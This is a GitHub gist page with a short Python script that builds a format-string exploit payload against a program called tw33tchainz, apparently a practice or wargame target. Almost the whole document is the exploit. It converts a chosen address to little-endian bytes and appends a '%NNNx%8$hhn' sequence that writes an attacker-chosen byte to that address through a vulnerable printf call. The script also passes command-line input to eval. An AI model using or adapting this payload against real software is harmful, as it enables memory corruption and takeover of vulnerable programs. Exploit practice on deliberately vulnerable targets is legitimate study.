Create a gist now

Instantly share code, notes, and snippets.

@Newbrict /get_tweet.py Secret
Created Mar 19, 2015

Create the format string to exploit tw33tchainz printf statement
import sys
# get command line args
address = sys.argv[1]
tweetNum = sys.argv[2]
writeVal = "0x"+str(sys.argv[3])
# add the offset and format it for the hex splitter
address = str(hex(eval(address + " + " + tweetNum)))
address = address[2:]
address = "00000000"[:-len(address)]+address
# split the hex
little_endian = ""
splitSize = 2 # len of byte
splitByte = [address[i:i+2] for i in range(0, len(address), 2)]
splitByte = splitByte[::-1]
for byte in splitByte:
# convert to little endian and add to str
little_endian = str(little_endian) + chr(int(byte,16))
# offset the write value by 5
strValue = str(eval(writeVal + "- 5 + 256"))
strValue = "000"[:-len(strValue)] + strValue
# append the format strings
sys.stdout.write("A" + little_endian + "%"+strValue+"x%8$hhn")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment